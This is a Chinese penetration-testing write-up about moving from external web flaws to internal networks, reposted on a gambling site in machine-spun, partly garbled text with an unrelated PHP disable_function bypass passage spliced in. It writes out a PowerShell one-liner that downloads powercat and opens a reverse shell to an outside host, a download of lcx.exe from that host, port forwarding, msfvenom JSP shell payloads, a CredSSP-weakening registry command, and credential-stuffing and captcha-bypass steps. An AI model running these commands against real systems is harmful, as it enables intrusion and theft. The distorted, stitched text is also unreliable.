欢迎访问Sunbet官网(www.sunbet.us),Allbet欧博官网(www.ALLbetgame.us)!

首页Sunbet_人物事迹正文

从外网到内网的渗入分享

b9e08c31ae1faa592019-06-03382

如今这段时候是全员 hw 时代,恰好头几天也有幸介入了某个处所的 hw 行为,作为进击方,这里就简朴总结一下近来挖洞的思绪吧。由于可以或许怕涉及到敏感的器械,这里就有的处所不会细说了。

  • 由于本身对照菜,以是只能做一点对照基本的总结,大佬们请疏忽吧...

渗入的大致历程

全部渗入测试的流程就是经由过程信息收,集到外网的 web 破绽发掘,来猎取一个 webshell ,经由过程这个 shell 进一步利用来打进内网,举行内网渗入、域渗入,终究猎取域控权限的一个历程。

从外网发掘破绽的一些要领

罕见的渗入思绪这里就不引见了,也对照罕见,这里重要想记载一下本身在测试中用到的要领。

拿到响应的资产,剖析完 ip 段或许网址以后,直接上大型扫描器!直接上大型扫描器!直接上大型扫描器!对你没有听错。

从外网到内网的渗入分享  第1张

须要检测 web 破绽的话,须要对响应的 IP 举行端口扫描,端口扫描的话用御剑高速端口扫描东西这个东西,效果异常棒!把扫描的速率越调低效果就会越准确。

扫描完成以后可以或许导出响应的扫描效果,获得响应的 IP 效果以后,再丢进 AWVS 直接运用剧本批量扫描,或许批量弱口令爆破就好了。总之套路就是须要注重批量!批量!批量!就好了

这是上次批量扫了两天的效果,照样很可观,照样混了许多洞的啊哈哈哈哈。不外是不是属于资产范围内的就须要本身考证了。

从外网到内网的渗入分享  第2张

从外网扯开口儿的罕见操纵

框架、中间件破绽

最罕见的就是 Struts2、weblogic 等已有的 RCE 破绽。
检测的要领就是运用现有的东西举行批量扫描,也可以或许本身写一个剧本举行指纹探测以后再检测破绽。或许丢进 Nessus 或许 AWVS 中一样平常都可以或许本身检测出来。

东西的话网上也对照多了,引荐运用 .net 写的小东西,网络发包速率快,也很稳固。

  • 检测 S2 破绽的话引荐运用Struts2破绽搜检东西2018版这个东西,可以或许批量!贼爽!

撞库破绽

主若是针对于一些员工体系和登录体系、信息查询体系、OA 体系举行撞库,在没有考证码的登录体系中屡试不爽。

测试要领

无考证码的状况

起首这些体系一样平常外部只要一个登录框,先查看有没有考证码,没有考证码直接导入中国罕见用户名字典,暗码为弱口令字典(或许直接就设置成 123456)。

从外网到内网的渗入分享  第3张

  • 或许暗码可以或许改成用户名+数字的情势,比方用户名是 zhangsan,可以或许实验每一个用户对应的暗码字典为 zhangsan12、zhangsan123 这类范例。

若是邮箱登录,则须要先网络一下体系的邮箱后缀,罕见的网络要领有 google hack、特地网络目的站邮箱的查询网址。

拿到了后缀以后,运用用户拼音+邮箱后缀的体式格局举行爆破。注重这里有两种体式格局。

  1. 用户名划定规矩运用用户全拼音。比方 zhangsan@abc.com。
  2. 用户名划定规矩运用姓的全拼+名的缩写。比方 zhangs@abc.com,wangjk@abc.com。

总的来说,第二种体式格局对照罕见,也可以或许两种都尝尝。

有考证码的状况

这里就说下有考证码,然则考证码可以或许绕过的状况。

以下面的状况,直接把 cookie 删除以后就不会考证 randcode 的值了,可以或许这代码写的也对照奇葩吧

从外网到内网的渗入分享  第4张

弱口令破绽

公网数据库爆破

web 登录体系的弱口令爆破就不说了,有一种思绪是直接对公网的 IP 地点的数据库弱口令爆破,个人感觉照样对照爽的。

由于资产给的有时候是整几个网段,以是爆破的话可以或许胜利的几率也是挺大的。

这里引荐运用超等弱口令搜检东西这个东西,在 github 上也可以或许找到。勾选上一切的数据库的选项,把用户名和暗码字典导入,勾选上扫描端口。

命运运限好的话照样可以或许出效果的。

从外网到内网的渗入分享  第5张

内网数据库爆破

这里引荐运用 F-Scrack 和 DBScanner 东西,在 github 上面都有,进入内网以后弱口令对照多,扫描爆破的效果照样不错的。

从 webshell 到内网

从 sql 注入到内网渗入

直接举例。

拿到一个 mssql 注入,并且可以或许开启 xp_cmdshell 设置实行恣意敕令的状况下(--os-shell)。若是注入是属于回显、报错注入的话,直接实行敕令就没有太大的限定,若是是延时注入的话,要等很长时候能力回显,这就对照恶心了。

举个例子,像下面这类注入的话就是属于无页面回显,只能靠时候盲注能力出数据,依据时候盲注是一个字符一个字符的出数据,速率就会慢许多,并且有时候还不稳固。

从外网到内网的渗入分享  第6张

处理要领:
在 sqlmap 下猎取 xp_cmdshell 以后,直接实行:

PHP Webshell下绕过disable_function的方法

前言 在渗透测试中,会遇到自己有shell,但是不能执行命令不能提权等情况,我就把最近搞战中遇到的突破disable_function的方法(都是一些大佬研究出来,先感谢一波)总结与复现了一下,这些方法面试也经常会问 一.系统组件绕过 window com组件(php 5.4)(高版本扩展要自己添加) 条件:要在php.ini中开启(如图) 利用代码,利用shell上传如下代码到目标服务器上 exec("cmd /c ".$command); //调用对象方法来执行命令 $stdout = $exec->StdOut(); $stroutput = $stdout->ReadAll(); echo $stroutput; ?> 利用成功后的结果 二.利用ImageMagick漏洞绕过disable_function ImageMagick是一套功能强大、稳定而且开源的工具集和开发包,可以用来读、写和处理超过89种基本格式的图片文件,如果phpinfo中看到有这个,可以尝试如下利用 利用代码如下

powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c 123.207.xx.xx -p 9999 -e cmd

在 vps 上监听一个 9999 端口,等着弹回 shell (system32 下的 cmd)就好了。然后拿到 shell 以后继承运用 powershell 下载长途木马或许端口到靶机上就好了。

从外网到内网的渗入分享  第7张

powershell 下载长途文件敕令:

  • 下载 lcx 到当地举行 3389 端口转发
powershell "$c=new-Object \"System.Net.WebClient\";$c.DownloadFile(\"http://123.207.xx.xx:81/static/lcx.exe\",\"C:/Users/Administrator/Desktop/lcx.exe\");";

第二个参数填入生存到的途径便可和生存的文件名便可。

  • 若公网跳板机是 linux 的话,可以或许运用 linux 版本的 lcx,也就是 portmap

用法:

./portmap -m 2 -p1 7777 -h2 211.141.xx.xx -p2 9999
  • 这里的 h2 是长途效劳的 ip 地点。

从 S2-045 到内网渗入

检测 S2 的要领就不说了,直接东西一把梭。这里引荐运用 "Struts2破绽搜检东西2018版" 这个东西,可以或许批量导入 url ,效力照样可以或许的。然则能不能出洞重要照样看命运运限看品德哈哈哈。

从外网到内网的渗入分享  第8张

  • 简朴检测 S2 破绽的要领:看 Uri 的后缀是不是为 .do 或许 .action,是的话直接丢进去东西考证。

猎取 S2 以后的操纵步调

  1. 第一个要领就是上面说的,有 powershell 的话直接一把梭 getshell。或许可以或许合营 Empire 天生一个 powershell 的 payload 直接运转。然则这类要领有时候由于种种原因会不太稳固。
  2. 第二种要领可以或许用上面谁人东西举行文件上传传小马上去,接着用小马客户端传大马就好了,这是通例套路。

从外网到内网的渗入分享  第9张

Q:拿到大马以后要干啥?
A:固然要进一步渗入了,内网渗入、域渗入。

Q: 然则详细怎样做?
A: 先 ipconfig 看看是不是是内网 IP,若是是的话就传个 msf 马上去进一步操纵,或许用 lcx 或许 ew 把 3389 转发到公网。

Q: 然则要怎样传呢?直接运用大马的上传功用吗?
A: 不可。由于 jsp 的上传只支撑可见字符字节码的上传,二进制数据没办法直接上传。

Q: 那该怎样操纵?
A: 我这里是用 Base64 编码的体式格局,先把 exe 文件全部编码,以后组织一个 jsp 的上传点,在上传完成以后在网站目次下解码便可,解码以后就释放到网站目次下了。

  • 参考:https://blog.51cto.com/0x007/1204440

  • 在实战情况下碰到的险些都是 jsp 的站点,php 的站异常少,以是须要日常平凡多积聚多演习一下对 jsp 站点的渗入

从文件上传 getshell 到内网

测试历程碰到一个对照奇葩的文件上传破绽,发作在背景用户头像上传处,可以或许抓包直接修正上传的文件后缀为 jsp 文件,就可以或许直接举行上传,无任何考证,且上传完成后还会返回给你全部马子的途径。

从外网到内网的渗入分享  第10张

可以或许直接上传木马的话,就可以或许直接上大马或许用 msf 直接天生一个 jsp 马(msfvenom)。

java/jsp_shell_bind_tcp         // 用于当地没有外网 IP 或许长途的靶机无法外连的状况
java/jsp_shell_reverse_tcp      // 用于当地有公网 IP 的状况

将天生的 payload 直接经由过程文件上传上去,接着拿到途径直接接见便可,在 msf 里可以或许升级到 meterpreter 以后就可以或许随心所欲了。

可以或许会碰到的一些问题

  1. 拿到 shell,将 3389 端口转发出来以后,实验衔接发明出现问题,预计是限定了我这边的 IP 接见。

从外网到内网的渗入分享  第11张

处理要领:增加注册表 AllowEncryptionOracle 项便可。

参考:https://www.cnblogs.com/lindajia/p/9021082.html

一条敕令直接处理(须要在 system32 目次下的 cmd 中实行):

REG add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\CredSSP\Parameters /v AllowEncryptionOracle /t REG_DWORD /d 2 /f

.

  1. 将 msf 署理进内网

直接运用敕令:

proxychains msfconsole

或许在 set payload 以后,实行:

set proxies socks5:192.168.0.1:1080

.

  1. 拿到一个 shell 以后区分是不是是内/外网 IP

以下图的状况就申明他只要内网 IP,没有公网 IP,也就是这个机子是用网线接在路由器/交流机上的。我们能接见到他的 80 端口的效劳是由于在交流机/路由器上做了端口映射。

从外网到内网的渗入分享  第12张

在网络映射中是如许透露表现的:

从外网到内网的渗入分享  第13张

以是这时候你一样平常就没有办法直接衔接到他的 3389 端口,由于他在内网里以是就只能运用端口转发了。

若是存在外网 IP 的话显现的就是外网 IP。有时候也会碰到既有公网 IP 也有内网 IP 的状况下。

总结

这里只是总结一下在这时期学到的器械,重要照样要搞进内网得分才高,以是渗入的目的照样要盯着内网,总的来说本身照样太菜了,须要继承勤奋。


网友评论